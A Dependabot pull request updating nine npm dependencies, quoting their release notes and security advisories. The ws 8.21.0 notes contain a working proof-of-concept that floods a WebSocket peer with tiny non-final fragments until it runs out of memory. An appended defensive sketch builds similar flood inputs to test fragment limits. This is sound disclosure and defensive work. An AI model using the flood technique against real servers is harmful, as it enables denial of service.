
chore(deps): bump the npm_and_yarn group across 1 directory with 9 updates #4

Open
dependabot[bot] wants to merge 1 commit into main from dependabot/npm_and_yarn/common/nixos/overlays/pi-coding-agent/npm_and_yarn-aa1834640e

dependabot Bot commented on behalf of github Jun 22, 2026


Bumps the npm_and_yarn group with 2 updates in the /common/nixos/overlays/pi-coding-agent directory: @mariozechner/pi-coding-agent and brace-expansion.

Updates @mariozechner/pi-coding-agent from 0.66.1 to 0.73.1

Release notes

Sourced from @​mariozechner/pi-coding-agent's releases.

v0.73.1

New Features

  • Self-update support for the npm scope migration: pi update --self now supports the upcoming package rename from @mariozechner/pi-coding-agent to @earendil-works/pi-coding-agent. After the new package is published, existing global installs can update through the normal self-update flow; pi will uninstall the old global package and install the package name returned by the version check endpoint.
  • Interactive OAuth login selection: OAuth providers can now present multiple login choices in /login, enabling provider-specific interactive authentication flows. See Providers.
  • JSONC-style models.json parsing: models.json now allows comments and trailing commas, making custom provider and model configuration easier to maintain. See Providers and Custom Providers.

Added

  • Added interactive login selection support so OAuth providers can present multiple login choices (#4190 by @​mitsuhiko).

Changed

  • Changed pi update --self to honor the active package name returned by the Pi version check endpoint, defaulting to the current package when omitted and uninstalling the old global package before installing a renamed package.
  • Changed extension loading to use upstream jiti 2.7 instead of the @mariozechner/jiti fork (#4244 by @​pi0).
  • Changed models.json parsing to allow comments and trailing commas (#4162 by @​julien-c).

Fixed

  • Fixed pi -p treating prompts that start with YAML frontmatter as extension flags instead of user messages (#4163).
  • Fixed pending tool results not updating in the live TUI after toggling thinking block visibility while the tool is running (#4167).
  • Fixed /copy reporting success on Linux without writing the clipboard on Wayland-only compositors (Hyprland, Niri, ...) by skipping the X11-only native addon on Linux and routing through wl-copy/xclip/xsel instead (#4177).
  • Fixed HTML session exports to strip skill wrapper XML from rendered user messages (#4234 by @​aliou).
  • Fixed OpenAI-compatible chat completion streams that interleave content and tool-call deltas in the same choice.
  • Fixed OpenAI Codex OAuth refresh failures writing directly to stderr while the TUI is active (#4141).
  • Fixed OpenAI Codex Responses requests to send a non-empty system prompt (#4184).
  • Fixed Kimi For Coding model resolution for the Kimi K2 P6 alias (#4218).
  • Fixed Kitty inline image redraws to stay within TUI-owned terminal regions and avoid writing below the active viewport.
  • Fixed Kitty inline image rendering by letting the terminal allocate image ids and bounding parsed image ids to valid values.
  • Fixed inline image capability detection to disable inline images in cmux terminals.

v0.73.0

New Features

Breaking Changes

  • Switched the built-in xiaomi provider from Token Plan AMS to Xiaomi's API billing endpoint, and renamed its /login display from "Xiaomi MiMo Token Plan" to "Xiaomi MiMo". XIAOMI_API_KEY now refers to the API billing key from platform.xiaomimimo.com. Users on Token Plan should switch to the appropriate xiaomi-token-plan-* provider and set the corresponding env var (#4112 by @​Phoen1xCode).

Added

  • Added three Xiaomi MiMo Token Plan regional providers visible in /login: xiaomi-token-plan-cn (XIAOMI_TOKEN_PLAN_CN_API_KEY), xiaomi-token-plan-ams (XIAOMI_TOKEN_PLAN_AMS_API_KEY), xiaomi-token-plan-sgp (XIAOMI_TOKEN_PLAN_SGP_API_KEY). Each defaults to mimo-v2.5-pro (#4112 by @​Phoen1xCode).

Changed

... (truncated)

Changelog

Sourced from @​mariozechner/pi-coding-agent's changelog.

[0.73.1] - 2026-05-07

New Features

  • Self-update support for the npm scope migration: pi update --self now supports the upcoming package rename from @mariozechner/pi-coding-agent to @earendil-works/pi-coding-agent. After the new package is published, existing global installs can update through the normal self-update flow; pi will uninstall the old global package and install the package name returned by the version check endpoint.
  • Interactive OAuth login selection: OAuth providers can now present multiple login choices in /login, enabling provider-specific interactive authentication flows. See Providers.
  • JSONC-style models.json parsing: models.json now allows comments and trailing commas, making custom provider and model configuration easier to maintain. See Providers and Custom Providers.

Added

  • Added interactive login selection support so OAuth providers can present multiple login choices (#4190 by @​mitsuhiko).

Changed

  • Changed pi update --self to honor the active package name returned by the Pi version check endpoint, defaulting to the current package when omitted and uninstalling the old global package before installing a renamed package.
  • Changed extension loading to use upstream jiti 2.7 instead of the @mariozechner/jiti fork (#4244 by @​pi0).
  • Changed models.json parsing to allow comments and trailing commas (#4162 by @​julien-c).

Fixed

  • Fixed pi -p treating prompts that start with YAML frontmatter as extension flags instead of user messages (#4163).
  • Fixed pending tool results not updating in the live TUI after toggling thinking block visibility while the tool is running (#4167).
  • Fixed /copy reporting success on Linux without writing the clipboard on Wayland-only compositors (Hyprland, Niri, ...) by skipping the X11-only native addon on Linux and routing through wl-copy/xclip/xsel instead (#4177).
  • Fixed HTML session exports to strip skill wrapper XML from rendered user messages (#4234 by @​aliou).
  • Fixed OpenAI-compatible chat completion streams that interleave content and tool-call deltas in the same choice.
  • Fixed OpenAI Codex OAuth refresh failures writing directly to stderr while the TUI is active (#4141).
  • Fixed OpenAI Codex Responses requests to send a non-empty system prompt (#4184).
  • Fixed Kimi For Coding model resolution for the Kimi K2 P6 alias (#4218).
  • Fixed Kitty inline image redraws to stay within TUI-owned terminal regions and avoid writing below the active viewport.
  • Fixed Kitty inline image rendering by letting the terminal allocate image ids and bounding parsed image ids to valid values.
  • Fixed inline image capability detection to disable inline images in cmux terminals.

[0.73.0] - 2026-05-04

New Features

Breaking Changes

  • Switched the built-in xiaomi provider from Token Plan AMS to Xiaomi's API billing endpoint, and renamed its /login display from "Xiaomi MiMo Token Plan" to "Xiaomi MiMo". XIAOMI_API_KEY now refers to the API billing key from platform.xiaomimimo.com. Users on Token Plan should switch to the appropriate xiaomi-token-plan-* provider and set the corresponding env var (#4112 by @​Phoen1xCode).

Added

  • Added three Xiaomi MiMo Token Plan regional providers visible in /login: xiaomi-token-plan-cn (XIAOMI_TOKEN_PLAN_CN_API_KEY), xiaomi-token-plan-ams (XIAOMI_TOKEN_PLAN_AMS_API_KEY), xiaomi-token-plan-sgp (XIAOMI_TOKEN_PLAN_SGP_API_KEY). Each defaults to mimo-v2.5-pro (#4112 by @​Phoen1xCode).

Changed

... (truncated)

Commits
  • 781152f Release v0.73.1
  • 7fa924b docs: audit unreleased changelog entries
  • 5e1e4c3 feat(coding-agent): support renamed self-update package
  • 50993d7 chore(coding-agent): switch back from fork to upstream jiti 2.7 (#4244)
  • 8861966 fix(coding-agent): strip skill wrapper XML from HTML export user messages (#4...
  • 060c10b fix(coding-agent): skip X11-only native addon for /copy on Linux
  • 755da30 fix(coding-agent): keep pending tool renders after thinking toggle
  • b5755fd feat(oauth): support interactive login selection (#4190)
  • bb25a39 feat(coding-agent): allow comments and trailing commas in models.json (#4162)
  • bac2df3 fix(coding-agent): handle frontmatter prompts in print mode
  • Additional commits viewable in compare view

Updates basic-ftp from 5.2.2 to 5.3.1

Release notes

Sourced from basic-ftp's releases.

5.3.1

5.3.0

  • Changed: Introduced an upper bound for total bytes of directory listing, fixes GHSA-rp42-5vxx-qpwr.
  • Added: Option to increase the upper bound for total bytes of directory listing in Client constructor.
Changelog

Sourced from basic-ftp's changelog.

5.3.1

5.3.0

  • Changed: Introduced an upper bound for total bytes of directory listing, fixes GHSA-rp42-5vxx-qpwr.
  • Added: Option to increase the upper bound for total bytes of directory listing in Client constructor.
Commits

Updates brace-expansion from 5.0.5 to 5.0.6

Commits

Updates fast-xml-builder from 1.1.4 to 1.2.0

Changelog

Sourced from fast-xml-builder's changelog.

1.2.0 (2026-05-08)

  • Add support for sanitizeName option
  • Support xml-naming for validating and sanitizing tag and attribute names

1.1.9 (2026-05-06)

  • fix: format output for preserve order when indent by is set to empty string

1.1.8 (2026-05-05)

  • fix: skip text property for PI tags
  • improve typings

1.1.7 (2026-05-04)

  • fix security issues when attribute value contains quotes

1.1.6 (2026-05-04)

  • fix security issues related to comment
  • skip comment with null value

1.1.5 (2026-04-17)

  • fix security issues related to comment and cdata

1.1.4 (2026-03-16)

  • support maxNestedTags option

1.1.3 (2026-03-13)

  • declare Matcher & Expression as unknown so user is not forced to install path-expression-matcher

1.1.2 (2026-03-11)

  • fix typings

1.1.1 (2026-03-11)

  • upgrade path-expression-matcher to 1.1.3

1.1.0 (2026-03-10)

Commits

Updates fast-xml-parser from 5.5.8 to 5.7.3

Release notes

Sourced from fast-xml-parser's releases.

fix minor old bugs and update builder

  • fix: alwaysCreateTextNode should create text node when attributes are present for self closing node
  • fix stop node expression when ns prefix is removed (found by iruizsalinas)
  • update XML Builder to 1.1.7
  • mark addEntity deprecated

backward compatibility for numerical external entity, fix #705, #817

  • allow numerical external entity for backward compatibility
  • fix #705: attributesGroupName working with preserveOrder
  • fix #817: stackoverflow when tag expression is very long

upgrade @​nodable/entities and FXB

  • Use @nodable/entities v2.1.0
    • breaking changes
      • single entity scan. You're not allowed to use entity value to form another entity name.
      • you can't add numeric external entity
      • entity error message when expansion limit is crossed might change
    • typings are updated for new options related to process entity
    • please follow documentation of @nodable/entities for more detail.
    • performance
      • if processEntities is false, then there should not be impact on performance.
      • if processEntities is true, but you don't pass entity decoder separately then performance may degrade by approx 8-10%
      • if processEntities is true, and you pass entity decoder separately
        • if no entity then performance should be same as before
        • if there are entities then performance should be increased from past versions
    • ignoreAttributes is not required to be set to set xml version for NCR entity value
  • update 'fast-xml-builder' to sanitize malicious CDATA and comment's content

use @​nodable/entities to replace entities

  • No API change
  • No change in performance for basic usage
  • No typing change
  • No config change
  • new dependency
  • breaking: error messages for entities might have been changed.

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.5.12...v5.6.0

performance improvement, increase entity expansion default limit

  • increase default entity expansion limit as many projects demand for that

        maxEntitySize: 10000,
        maxExpansionDepth: 10000,
        maxTotalExpansions: Infinity,
        maxExpandedLength: 100000,
        maxEntityCount: 1000,

  • performance improvement
    • reduce calls to toString
    • early return when entities are not present

... (truncated)

Changelog

Sourced from fast-xml-parser's changelog.

Note: If you find missing information about particular minor version, that version must have been changed without any functional change in this library.

Note: Due to some last quick changes on v4, detail of v4.5.3 & v4.5.4 are not updated here. v4.5.4x is the last tag of v4 in github repository. I'm extremely sorry for the confusion

5.9.3 / 2026-06-19

  • update strnum

5.9.2 / 2026-06-17

  • dummy release to test changes in github action

5.9.1 / 2026-06-17

  • dummy release to test release from github action

5.9.0 / 2026-06-15

  • update strnum to 2.3.0
    • you can set hex, binary, enotation, infinity, unicode
  • validate unsafe HTML or XML data in doctype entities using 'is-unsafe' library. User can override rules by overriding EntityDecoder.

5.8.0 / 2026-05-12

  • integrate xml-naming to validate DOCTYPE entity name and notation name (using qname because of backward compatibility)
    • This will consider xml-version as well. '1.0' is default
  • update strnum to 2.3.0
    • You can set octal and binary parsing which is by default off
  • update fast-xml-builder to 1.2.0
    • can sanitize tag names if found invalid
    • fix format output

5.7.3 / 2006-05-05

  • fix: alwaysCreateTextNode should create text node when attributes are present for self closing node
  • fix stop node expression when ns prefix is removed (found by iruizsalinas)
  • update XML Builder to 1.1.7
  • mark addEntity deprecated

5.7.2 / 2026-04-25

  • allow numerical external entity for backward compatibility
  • fix #705: attributesGroupName working with preserveOrder
  • fix #817: stackoverflow when tag expression is very long

5.7.1 / 2026-04-20

  • fix typo in CJS typing file

5.7.0 / 2026-04-17

  • Use @nodable/entities v2.1.0
    • breaking changes
      • single entity scan. You're not allowed to use entity value to form another entity name.
      • you can't add numeric external entity
      • entity error message when expansion limit is crossed might change

... (truncated)

Commits
  • d6d8042 update to release
  • d263370 remove dev dependency 'he'
  • f9c9a2c update builder to 1.1.7
  • b65da87 update changelog and mark addEntity deprecated
  • c2ca631 update fxb
  • da75191 fix stop node expression when ns prefix is removed
  • 31bbc99 fix: alwaysCreateTextNode should create text node when attributes are present...
  • dab327a remove unnecessary
  • ab04eeb update docs
  • 383cb3f Revise security information for v6 release
  • Additional commits viewable in compare view

Updates ip-address from 10.1.0 to 10.2.0

Commits
  • 80fccaa 10.2.0
  • abaeb4d Type Address4.addressMinusSuffix as non-nilable (closes #143)
  • 2878c29 Preserve subnet prefix through Address6.to4() (closes #123) (#203)
  • 586666e Reject trailing junk in Address6.fromURL (closes #158) (#202)
  • 80bc76e Validate static factories instead of silently overflowing (#201)
  • 98927be Clarify isValid() accepts CIDRs with host bits set (#81)
  • a0eb073 Fix getScope() and broaden getType() classification (closes #122) (#200)
  • ec52105 Add networkForm() for CIDR network-address strings (#199)
  • a9443a7 Add isMapped4() predicate for IPv4-mapped IPv6 addresses (closes #62) (#198)
  • f01d742 Add address-property predicates (private, ULA, loopback, link-local, etc.) (#...
  • Additional commits viewable in compare view

Updates protobufjs from 7.5.4 to 7.6.4

Release notes

Sourced from protobufjs's releases.

protobufjs: v7.6.4

7.6.4 (2026-06-12)

Bug Fixes

protobufjs: v7.6.3

7.6.3 (2026-06-09)

Bug Fixes

  • Avoid name collisions in generated code (#2311) (78a9576)
  • Preserve null conversion behavior for fieldless messages (#2312) (df91652)

protobufjs: v7.6.2

7.6.2 (2026-05-30)

Bug Fixes

  • Backport consistency and correctness fixes (#2294) (a92f72e)

protobufjs: v7.6.1

7.6.1 (2026-05-22)

Bug Fixes

protobufjs: v7.6.0

7.6.0 (2026-05-18)

Features

protobufjs: v7.5.9

7.5.9 (2026-05-17)

Bug Fixes

  • Backport bundler-safe optional module lookups (#2254) (0853a62)

... (truncated)

Changelog

Sourced from protobufjs's changelog.

7.6.4 (2026-06-12)

Bug Fixes

7.6.3 (2026-06-09)

Bug Fixes

  • Avoid name collisions in generated code (#2311) (78a9576)
  • Preserve null conversion behavior for fieldless messages (#2312) (df91652)

7.6.2 (2026-05-30)

Bug Fixes

  • Backport consistency and correctness fixes (#2294) (a92f72e)

7.6.1 (2026-05-22)

Bug Fixes

7.6.0 (2026-05-18)

Features

7.5.9 (2026-05-17)

Bug Fixes

  • Backport bundler-safe optional module lookups (#2254) (0853a62)

7.5.8 (2026-05-12)

Bug Fixes

... (truncated)

Commits
Maintainer changes

This version was pushed to npm by GitHub Actions, a new releaser for protobufjs since your current version.


Updates undici from 7.24.7 to 7.28.0

Release notes

Sourced from undici's releases.

v7.28.0

⚠️ Security Release

This release line addresses 7 security advisories, all shipped in v7.28.0.

Action required: Upgrade to undici 7.28.0 or later.

npm install undici@^7.28.0

The v7 line is not affected by GHSA-38rv-x7px-6hhq (CVE-2026-9675), which is an 8.x-only regression.

Note on GHSA-hm92-r4w5-c3mj: this fix shipped in v7.28.0, not the earlier 7.2x line — the vulnerable single-pool code was still present through v7.27.2. The per-origin pool fix is 3805b8f8 (#5041).

Summary

| Advisory | CVE | Severity (CVSS) | Fixed in | Fix commit |
|---|---|---|---|---|
| GHSA-vxpw-j846-p89q | CVE-2026-12151 | High (7.5) | 7.28.0 | 8cb10f98 |
| GHSA-vmh5-mc38-953g | CVE-2026-9697 | High (7.4) | 7.28.0 | 04201f89 |
| GHSA-hm92-r4w5-c3mj | CVE-2026-6734 | High (7.5) | 7.28.0 | 3805b8f8 |
| GHSA-pr7r-676h-xcf6 | CVE-2026-9678 | Moderate (5.9) | 7.28.0 | 85a24055 |
| GHSA-p88m-4jfj-68fv | CVE-2026-9679 | Moderate (5.9) | 7.28.0 | d0574cc4 |
| GHSA-g8m3-5g58-fq7m | CVE-2026-11525 | Low (3.7) | 7.28.0 | d0574cc4 |
| GHSA-35p6-xmwp-9g52 | CVE-2026-6733 | Low (3.7) | 7.28.0 | ea8930cf |

High severity

WebSocket DoS via fragment count bypass — CVE-2026-12151

GHSA-vxpw-j846-p89q · CWE-400, CWE-770
Fix: 8cb10f98 websocket: limit the number of fragments in a message (part of backport a027a4a0 Backport WebSocket maxPayloadSize fixes to v7.x, #5423)

A malicious WebSocket server can stream a large number of small or empty continuation frames. Undici enforced a limit on cumulative payload size but did not limit the number of fragments per message, leading to unbounded memory growth and denial of service.

  • Affected: applications using new WebSocket(...) or WebSocketStream against untrusted endpoints.
  • Workaround: none — upgrade is required.

TLS certificate validation bypass in SOCKS5 ProxyAgent — CVE-2026-9697

GHSA-vmh5-mc38-953g · CWE-295

... (truncated)

Commits
  • f9eba0a Bumped v7.28.0 (#5430)
  • a027a4a Backport WebSocket maxPayloadSize fixes to v7.x (#5423)
  • 8cb10f9 websocket: limit the number of fragments in a message
  • 04201f8 fix: honor requestTls when proxy is SOCKS5
  • fcd642f fix(socks5): preserve dispatch backpressure return value (#5166)
  • bc98c97 fix(socks5): use configured connector in Socks5ProxyAgent (#5168)
  • 9e1c743 fix(socks5): encode embedded IPv4 tails in IPv6 literals correctly (#5099)
  • 376c8be fix(socks5): enforce authenticated state before CONNECT (#5097)
  • 3805b8f fix(socks5-proxy-agent): use per-origin pools to prevent cross-origin routing...
  • 85a2405 fix(cache): trim qualified field names
  • Additional commits viewable in compare view

Updates ws from 8.20.0 to 8.21.0

Release notes

Sourced from ws's releases.

8.21.0

Features

  • Introduced the maxBufferedChunks and maxFragments options (2b2abd45).

Bug fixes

  • Fixed a remote memory exhaustion DoS vulnerability (2b2abd45).

A high volume of tiny fragments and data chunks could be sent by a peer, using modest network traffic, to crash a ws server or client due to OOM.

    import { WebSocket, WebSocketServer } from 'ws';

    const wss = new WebSocketServer({ port: 0 }, function () {
      const data = Buffer.alloc(1);
      // fin: false marks every frame as a non-final fragment
      const options = { fin: false };
      const { port } = wss.address();
      const ws = new WebSocket(`ws://localhost:${port}`);

      ws.on('open', function () {
        // Send the next 1-byte fragment as soon as the previous one is written
        (function send() {
          ws.send(data, options, function (err) {
            if (err) return;
            send();
          });
        })();
      });

      ws.on('error', console.error);
      ws.on('close', function (code, reason) {
        console.log(`client close - code: ${code} reason: ${reason.toString()}`);
      });
    });

    wss.on('connection', function (ws) {
      ws.on('error', console.error);
      ws.on('close', function (code, reason) {
        console.log(`server close - code: ${code} reason: ${reason.toString()}`);
      });
    });

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

8.20.1

... (truncated)

Commits
  • bca91ad [dist] 8.21.0
  • 2b2abd4 [security] Limit retained message parts
  • 78eabe2 [security] Add latest vulnerability to SECURITY.md
  • 5d9b316 [dist] 8.20.1
  • c0327ec [security] Fix uninitialized memory disclosure in websocket.close()
  • ce2a3d6 [ci] Test on node 26
  • 58e45b8 [ci] Do not test on node 25
  • 5f26c24 [ci] Run the lint step on node 24
  • See full diff in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.



…dates

Bumps the npm_and_yarn group with 2 updates in the /common/nixos/overlays/pi-coding-agent directory: [@mariozechner/pi-coding-agent](https://github.com/badlogic/pi-mono/tree/HEAD/packages/coding-agent) and [brace-expansion](https://github.com/juliangruber/brace-expansion).


Updates `@mariozechner/pi-coding-agent` from 0.66.1 to 0.73.1
- [Release notes](https://github.com/badlogic/pi-mono/releases)
- [Changelog](https://github.com/earendil-works/pi/blob/main/packages/coding-agent/CHANGELOG.md)
- [Commits](https://github.com/badlogic/pi-mono/commits/v0.73.1/packages/coding-agent)

Updates `basic-ftp` from 5.2.2 to 5.3.1
- [Release notes](https://github.com/patrickjuchli/basic-ftp/releases)
- [Changelog](https://github.com/patrickjuchli/basic-ftp/blob/master/CHANGELOG.md)
- [Commits](patrickjuchli/basic-ftp@v5.2.2...v5.3.1)

Updates `brace-expansion` from 5.0.5 to 5.0.6
- [Release notes](https://github.com/juliangruber/brace-expansion/releases)
- [Commits](juliangruber/brace-expansion@v5.0.5...v5.0.6)

Updates `fast-xml-builder` from 1.1.4 to 1.2.0
- [Changelog](https://github.com/NaturalIntelligence/fast-xml-builder/blob/main/CHANGELOG.md)
- [Commits](NaturalIntelligence/fast-xml-builder@v1.1.4...v1.2.0)

Updates `fast-xml-parser` from 5.5.8 to 5.7.3
- [Release notes](https://github.com/NaturalIntelligence/fast-xml-parser/releases)
- [Changelog](https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/CHANGELOG.md)
- [Commits](NaturalIntelligence/fast-xml-parser@v5.5.8...v5.7.3)

Updates `ip-address` from 10.1.0 to 10.2.0
- [Commits](beaugunderson/ip-address@v10.1.0...v10.2.0)

Updates `protobufjs` from 7.5.4 to 7.6.4
- [Release notes](https://github.com/protobufjs/protobuf.js/releases)
- [Changelog](https://github.com/protobufjs/protobuf.js/blob/protobufjs-v7.6.4/CHANGELOG.md)
- [Commits](protobufjs/protobuf.js@protobufjs-v7.5.4...protobufjs-v7.6.4)

Updates `undici` from 7.24.7 to 7.28.0
- [Release notes](https://github.com/nodejs/undici/releases)
- [Commits](nodejs/undici@v7.24.7...v7.28.0)

Updates `ws` from 8.20.0 to 8.21.0
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.20.0...8.21.0)

---
updated-dependencies:
- dependency-name: "@mariozechner/pi-coding-agent"
  dependency-version: 0.73.1
  dependency-type: direct:production
  dependency-group: npm_and_yarn
- dependency-name: basic-ftp
  dependency-version: 5.3.1
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: brace-expansion
  dependency-version: 5.0.6
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: fast-xml-builder
  dependency-version: 1.2.0
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: fast-xml-parser
  dependency-version: 5.7.3
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: ip-address
  dependency-version: 10.2.0
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: protobufjs
  dependency-version: 7.6.4
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: undici
  dependency-version: 7.28.0
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: indirect
  dependency-group: npm_and_yarn
...

Signed-off-by: dependabot[bot] <support@github.com>
dependabot Bot added the dependencies and javascript labels Jun 22, 2026
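The undici v7.28.0 and ws 8.21.0 release notes quoted in this PR both describe a receiver that capped cumulative payload bytes but not the number of fragments per message. The sketch below is an added example, not code from undici, ws or this repository: it reassembles short unmasked RFC 6455 frames and shows why a byte cap alone never trips on empty fragments while a fragment-count cap does. The names `frame`, `parseFrames`, `receive` and `demo`, the two limit values and the use of close code 1008 are assumptions of this example.

```javascript
// Added example: receiver-side limits for one fragmented WebSocket message.
// MAX_PAYLOAD_BYTES and MAX_FRAGMENTS are illustrative, not undici or ws defaults.
const MAX_PAYLOAD_BYTES = 1024;
const MAX_FRAGMENTS = 128;

// Build one unmasked frame (server-to-client) with a payload of at most 125 bytes.
function frame(opcode, fin, payload) {
  if (payload.length > 125) throw new RangeError('helper only builds short frames');
  return Buffer.concat([Buffer.from([(fin ? 0x80 : 0x00) | opcode, payload.length]), payload]);
}

// Walk a buffer of short unmasked frames and yield { fin, opcode, payload }.
function* parseFrames(stream) {
  let off = 0;
  while (off < stream.length) {
    if (off + 2 > stream.length) throw new RangeError('truncated header');
    const fin = (stream[off] & 0x80) !== 0;
    const opcode = stream[off] & 0x0f;
    if (stream[off + 1] & 0x80) throw new RangeError('masked frames not handled here');
    const len = stream[off + 1] & 0x7f;
    if (len > 125) throw new RangeError('extended lengths not handled here');
    const end = off + 2 + len;
    if (end > stream.length) throw new RangeError('truncated payload');
    yield { fin, opcode, payload: stream.subarray(off + 2, end) };
    off = end;
  }
}

// Reassemble messages, enforcing a byte cap and a fragment-count cap per message.
function receive(stream, limits) {
  const messages = [];
  let parts = null; // fragments retained for the message in progress
  let bytes = 0;
  const reject = (closeCode, reason) =>
    ({ ok: false, closeCode, reason, retainedParts: parts ? parts.length : 0, messages });

  for (const f of parseFrames(stream)) {
    if (f.opcode >= 0x8) continue; // control frames are outside this sketch
    if (f.opcode === 0x0) {
      if (parts === null) return reject(1002, 'continuation without a start frame');
    } else {
      if (parts !== null) return reject(1002, 'new data frame before FIN');
      parts = [];
      bytes = 0;
    }
    bytes += f.payload.length;
    if (bytes > limits.maxPayloadBytes) return reject(1009, 'message too big');
    // The count check is what stops empty fragments, which never move `bytes`.
    // 1008 (policy violation) is this sketch's choice of close code.
    if (parts.length >= limits.maxFragments) return reject(1008, 'too many fragments');
    parts.push(f.payload);
    if (f.fin) {
      messages.push(Buffer.concat(parts));
      parts = null;
    }
  }
  return { ok: true, retainedParts: parts ? parts.length : 0, messages };
}

// Constructed inputs: a normal fragmented text message and two never-finished messages.
function demo() {
  const unfinished = (payload, n) =>
    Buffer.concat([frame(0x2, false, payload), ...Array(n).fill(frame(0x0, false, payload))]);
  const legit = Buffer.concat([
    frame(0x1, false, Buffer.from('he')),
    frame(0x0, false, Buffer.from('ll')),
    frame(0x0, true, Buffer.from('o')),
  ]);
  const emptyFlood = unfinished(Buffer.alloc(0), 10000);
  const tinyFlood = unfinished(Buffer.alloc(1), 2000);
  const byteCapOnly = { maxPayloadBytes: MAX_PAYLOAD_BYTES, maxFragments: Infinity };
  const bothCaps = { maxPayloadBytes: MAX_PAYLOAD_BYTES, maxFragments: MAX_FRAGMENTS };
  return {
    legit: receive(legit, bothCaps),
    emptyByteCapOnly: receive(emptyFlood, byteCapOnly),
    tinyByteCapOnly: receive(tinyFlood, byteCapOnly),
    emptyBothCaps: receive(emptyFlood, bothCaps),
  };
}

const summary = Object.fromEntries(
  Object.entries(demo()).map(([k, r]) => [k, `${r.ok ? 'ok' : r.closeCode} parts=${r.retainedParts}`]));
console.log(summary);
```

With the byte cap alone, the number of retained 1-byte fragments is bounded only by the payload limit, which is why the ws note lists lowering maxPayload as a mitigation on versions without the fix.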